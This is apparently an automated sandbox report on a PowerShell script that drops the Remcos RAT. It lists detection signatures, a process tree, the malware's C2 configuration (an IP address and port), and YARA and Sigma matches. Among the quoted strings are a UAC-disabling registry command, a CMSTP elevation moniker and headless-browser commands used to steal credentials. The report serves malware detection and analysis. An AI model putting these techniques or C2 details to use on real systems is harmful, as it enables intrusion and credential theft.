Edit tour

Windows Analysis Report
kent.ps1

Overview

General Information

Sample name:	kent.ps1
Analysis ID:	1638292
MD5:	e281c45cf738c5bc79df3a4d039d38b0
SHA1:	3f8eee1f9129b4551740a39db2d270028fd4badc
SHA256:	c32fa7ca628ddf09f2cf6bbac4fcc9fec59e006fc85f982e719eba3f2b6c1837
Tags:	ps1user-TornadoAV_dev
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Found evasive API chain checking for user administrative privileges

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

PE file contains section with special chars

PE file has nameless sections

Powershell drops PE file

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Browser Execution In Headless Mode

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kent.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 6796 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: 83AD102EBF7A8FF7859C781C0DF45BE8)

JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 6896 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: 83AD102EBF7A8FF7859C781C0DF45BE8)

JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 6904 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: 83AD102EBF7A8FF7859C781C0DF45BE8)

chrome.exe (PID: 7020 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6344 cmdline: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --no-pre-read-main-dll --field-trial-handle=1924,i,6628952054718136810,6517183660532382401,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

recover.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gogzsxemgwpfijwqnpyiza" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 7076 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\iqlksqofuehskykceakkkmhvt" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 7100 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\tkrctizhimzxveggnlfdvrbmcaxfu" MD5: D38B657A068016768CA9F3B5E100B472)

msedge.exe (PID: 7752 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 7932 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1940 --field-trial-handle=1492,i,17985677580738979378,15190004238409929913,262144 --disable-features=PaintHolding /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

notepad.exe (PID: 6656 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\kent.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["196.251.69.63:2721:1"], "Assigned name": "Brazil", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-U6XQL5", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x7592f:$a1: Remcos restarted by watchdog! 0x76057:$a3: %02i:%02i:%02i:%03i

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.3959743316.0000000001558000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x71656:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c328:$a1: Remcos restarted by watchdog! 0xe5b68:$a1: Remcos restarted by watchdog! 0x6c978:$a3: %02i:%02i:%02i:%03i 0xe61b8:$a3: %02i:%02i:%02i:%03i
00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x5c2e8:$a1: Remcos restarted by watchdog! 0x5c938:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 6520	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x82867:$b1: ::WriteAllBytes( 0x83bcb:$b1: ::WriteAllBytes( 0x82890:$b2: ::FromBase64String( 0x83bf4:$b2: ::FromBase64String( 0x450bc:$s1: -join 0x45e44:$s1: -join 0xb8ea5:$s1: -join 0xc5f7a:$s1: -join 0xc934c:$s1: -join 0xc99fe:$s1: -join 0xcb4ef:$s1: -join 0xcd6f5:$s1: -join 0xcdf1c:$s1: -join 0xce78c:$s1: -join 0xceec7:$s1: -join 0xceef9:$s1: -join 0xcef41:$s1: -join 0xcef60:$s1: -join 0xcf7b0:$s1: -join 0xcf92c:$s1: -join 0xcf9a4:$s1: -join
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x18f5f:$a1: Remcos restarted by watchdog! 0x39e89:$a1: Remcos restarted by watchdog! 0x195b4:$a3: %02i:%02i:%02i:%03i 0x199f1:$a3: %02i:%02i:%02i:%03i 0x3a4de:$a3: %02i:%02i:%02i:%03i 0x3a91b:$a3: %02i:%02i:%02i:%03i
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x10588:$a1: Remcos restarted by watchdog! 0x10bdd:$a3: %02i:%02i:%02i:%03i 0x1101a:$a3: %02i:%02i:%02i:%03i
Process Memory Space: recover.exe PID: 7052	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.recover.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.49c0000.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
9.2.recover.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a358:$a1: Remcos restarted by watchdog! 0x6a9a8:$a3: %02i:%02i:%02i:%03i
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x645f4:$str_a1: C:\Windows\System32\cmd.exe 0x64570:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64570:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x650d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64664:$str_b2: Executing file: 0x6549c:$str_b3: GetDirectListeningPort 0x64ec8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65048:$str_b7: \update.vbs 0x6468c:$str_b9: Downloaded file: 0x64678:$str_b10: Downloading file: 0x6471c:$str_b12: Failed to upload file: 0x65464:$str_b13: StartForward 0x65484:$str_b14: StopForward 0x64fa0:$str_b15: fso.DeleteFile " 0x64f34:$str_b16: On Error Resume Next 0x64fd0:$str_b17: fso.DeleteFolder " 0x6470c:$str_b18: Uploaded file: 0x646cc:$str_b19: Unable to delete: 0x64f68:$str_b20: while fso.FileExists(" 0x64ba9:$str_c0: [Firefox StoredLogins not found]
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x644e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64478:$s1: CoGetObject 0x6448c:$s1: CoGetObject 0x644a8:$s1: CoGetObject 0x6e256:$s1: CoGetObject 0x64438:$s2: Elevation:Administrator!new:
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.49c0000.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x71656:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0xe5598:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i 0xe5be8:$a3: %02i:%02i:%02i:%03i
4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xdf728:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0xdf6b8:$s1: CoGetObject 0xdf6cc:$s1: CoGetObject 0xdf6e8:$s1: CoGetObject 0xe9496:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new: 0xdf678:$s2: Elevation:Administrator!new:
Click to see the 22 entries

Sigma Signatures

System Summary

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe", ParentImage: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ParentProcessId: 6904, ParentProcessName: JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7020, ProcessName: chrome.exe

Sigma detected: Browser Execution In Headless Mode

Source: Process started

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe", ParentImage: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ParentProcessId: 6904, ParentProcessName: JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7020, ProcessName: chrome.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kent.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3648, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kent.ps1", ProcessId: 6520, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

